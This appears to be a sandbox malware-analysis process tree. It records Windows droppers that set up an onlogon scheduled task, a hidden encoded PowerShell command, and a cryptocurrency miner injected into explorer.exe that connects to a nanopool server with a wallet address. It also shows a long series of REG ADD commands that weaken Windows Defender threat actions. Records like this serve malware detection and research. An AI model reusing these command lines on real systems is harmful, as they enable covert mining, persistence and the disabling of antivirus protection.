        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1604,16485674966326186786,7936897856548445401,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1120_1057601002" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1636 /prefetch:2
        6⤵
        
        PID:1972
      - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1604,16485674966326186786,7936897856548445401,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1120_1057601002" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2476 /prefetch:1
        6⤵
        
        PID:3876
      - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1604,16485674966326186786,7936897856548445401,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1120_1057601002" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2588 /prefetch:1
        6⤵
        
        PID:3976
      - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,16485674966326186786,7936897856548445401,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1120_1057601002" --mojo-platform-channel-handle=3680 /prefetch:8
        6⤵
        
        PID:4680
      - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1604,16485674966326186786,7936897856548445401,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1120_1057601002" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3692 /prefetch:2
        6⤵
        
        PID:4812
      - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,16485674966326186786,7936897856548445401,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1120_1057601002" --mojo-platform-channel-handle=464 /prefetch:8
        6⤵
        
        PID:3516
      - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,16485674966326186786,7936897856548445401,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1120_1057601002" --mojo-platform-channel-handle=3412 /prefetch:8
        6⤵
        
        PID:4980
- - C:\Users\Admin\AppData\Local\Temp\search_hyperfs_216.exe
    "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_216.exe"
    3⤵
    PID:3828
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /y .\QW1o459P.7
      4⤵
      PID:4896
- - C:\Users\Admin\AppData\Local\Temp\setup_2.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
    3⤵
    PID:2936
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 240
      4⤵
      Program crash
      PID:3964
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 764
      4⤵
      Program crash
      PID:4568
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 772
      4⤵
      Program crash
      PID:4436
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 796
      4⤵
      Program crash
      PID:3772
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 856
      4⤵
      Program crash
      PID:1728
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 984
      4⤵
      Program crash
      PID:1956
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 1016
      4⤵
      Program crash
      PID:3284
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 1384
      4⤵
      Program crash
      PID:1752
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "setup_2.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" & exit
      4⤵
      PID:4440
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "setup_2.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:1944
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 1372
      4⤵
      Program crash
      PID:3188
- - C:\Users\Admin\AppData\Local\Temp\anytime7.exe
    "C:\Users\Admin\AppData\Local\Temp\anytime7.exe"
    3⤵
    PID:1092
  - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
      4⤵
      PID:1132
    - - C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
        5⤵
        
        PID:4260
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
        6⤵
        
        PID:3144
        
        C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        7⤵
        
        PID:912
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Creates scheduled task(s)
        
        PID:4400
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
        7⤵
        
        PID:4580
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        8⤵
        
        PID:2380
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
        9⤵
        
        PID:3828
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        10⤵
        
        PID:2088
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.akh3/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6Dvl0gIbiYyxigXSfnBYotXJ0yRecaUeAIZEOUyK4WML" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
        10⤵
        
        PID:1840
    - - C:\Users\Admin\AppData\Local\Temp\logger2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\logger2.exe"
        5⤵
        
        PID:1940
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1940 -s 2232
        6⤵
        Program crash
        
        PID:1092
- - C:\Users\Admin\AppData\Local\Temp\anytime6.exe
    "C:\Users\Admin\AppData\Local\Temp\anytime6.exe"
    3⤵
    PID:2324
  - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
      4⤵
      PID:3176
    - - C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
        5⤵
        
        PID:4844
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
        6⤵
        
        PID:4268
        
        C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        7⤵
        
        PID:3404
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Creates scheduled task(s)
        
        PID:2020
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
        7⤵
        
        PID:3084
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        8⤵
        
        PID:2576
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
        9⤵
        
        PID:3804
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        10⤵
        
        PID:4864
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.akh3/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6Dvl0gIbiYyxigXSfnBYotXJ0yRecaUeAIZEOUyK4WML" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
        10⤵
        
        PID:3812
    - - C:\Users\Admin\AppData\Local\Temp\logger2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\logger2.exe"
        5⤵
        
        PID:1740
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1740 -s 2232
        6⤵
        Program crash
        
        PID:3664
- - C:\Users\Admin\AppData\Local\Temp\logger2.exe
    "C:\Users\Admin\AppData\Local\Temp\logger2.exe"
    3⤵
    PID:5112
  - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
      4⤵
      PID:2444
    - - C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
        5⤵
        
        PID:4904
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
        6⤵
        
        PID:4936
        
        C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        7⤵
        
        PID:4576
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Creates scheduled task(s)
        
        PID:2460
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
        7⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        8⤵
        
        PID:3812
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
        9⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        10⤵
        
        PID:3704
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.akh3/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6Dvl0gIbiYyxigXSfnBYotXJ0yRecaUeAIZEOUyK4WML" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
        10⤵
        
        PID:1084
    - - C:\Users\Admin\AppData\Local\Temp\logger2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\logger2.exe"
        5⤵
        
        PID:3440
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3440 -s 2244
        6⤵
        Program crash
        
        PID:2384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4596 -ip 4596
1⤵
PID:2396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4596 -ip 4596
1⤵
PID:3268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4596 -ip 4596
1⤵
PID:1948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4596 -ip 4596
1⤵
PID:1708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4596 -ip 4596
1⤵
PID:3528

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 480 -p 3520 -ip 3520
1⤵
PID:3976

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:4044
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
  2⤵
  PID:440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2936 -ip 2936
1⤵
PID:1816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 440 -ip 440
1⤵
PID:208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 440 -s 600
1⤵
- Program crash
PID:3556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4596 -ip 4596
1⤵
PID:1252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2936 -ip 2936
1⤵
PID:4628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4596 -ip 4596
1⤵
PID:3704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2936 -ip 2936
1⤵
PID:992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2936 -ip 2936
1⤵
PID:4384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4596 -ip 4596
1⤵
PID:5056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2936 -ip 2936
1⤵
PID:3112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4596 -ip 4596
1⤵
PID:4196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2936 -ip 2936
1⤵
PID:4384

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 568 -p 1940 -ip 1940
1⤵
PID:4368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2936 -ip 2936
1⤵
PID:224

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 504 -p 1740 -ip 1740
1⤵
PID:4100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2936 -ip 2936
1⤵
PID:1728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2936 -ip 2936
1⤵
PID:3872

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 468 -p 3440 -ip 3440
1⤵
PID:4600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4712 -ip 4712
1⤵
PID:3532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4044 -ip 4044
1⤵
PID:2144

C:\Users\Admin\AppData\Local\Temp\YdAIlVMUmInzfjlkV\onwvojrRqVPwWCr\hYjZPLA.exe
C:\Users\Admin\AppData\Local\Temp\YdAIlVMUmInzfjlkV\onwvojrRqVPwWCr\hYjZPLA.exe mN /site_id 525403 /S
1⤵
PID:2412
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:1740
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4320
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:4692
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3384
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3872
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4844
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4504
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4552
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\reg.exe
